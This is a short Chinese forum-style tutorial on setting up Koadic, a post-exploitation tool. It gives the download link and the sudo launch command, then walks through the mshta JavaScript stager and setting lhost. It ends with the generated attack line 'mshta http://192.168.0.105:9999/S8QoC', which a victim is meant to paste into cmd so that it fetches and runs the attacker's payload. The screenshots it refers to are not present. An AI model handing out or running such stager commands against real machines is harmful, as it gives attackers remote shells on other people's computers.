渗透工具Koadic
在朋友的博客上看到推荐的一款工具Koadic,我接触了以后发现很不错这款工具的强大之处我觉得就是拿到shell后的各种模块功能,我就自己写出来发给大家看看吧。首先把项目克隆到本地:项目地址https://github.com/zerosum0x0/koadic.git然后解压,如果你要安装到你指定的目录就先cd到那个目录在下载,我是复制到那了,所以我解压。如下图运行koadic
cd koadic-master/ //cd到软件目录
sudo ./koadic //用最高权限运行koadic打开Koadic,显示需要设置的内容下图命令如下(koadic: sta/js/mshta)# info //查看需要设置的内容查看工具使用帮助(koadic: sta/js/mshta)# help进入主题 ,开始设置。听着是不是热血沸腾要往下看了,哈哈。其实没啥要讲的,你只需要set lhost这个命令大家应该都懂得,就是设置本地ip。如下图注意看,他生成了一个网址,其实这是一个恶意网址,里面装载了exploit最后生成的利用命令如下mshta http://192.168.0.105:9999/S8QoC利用方法是放到cmd里面执行
如下图
页:
[1]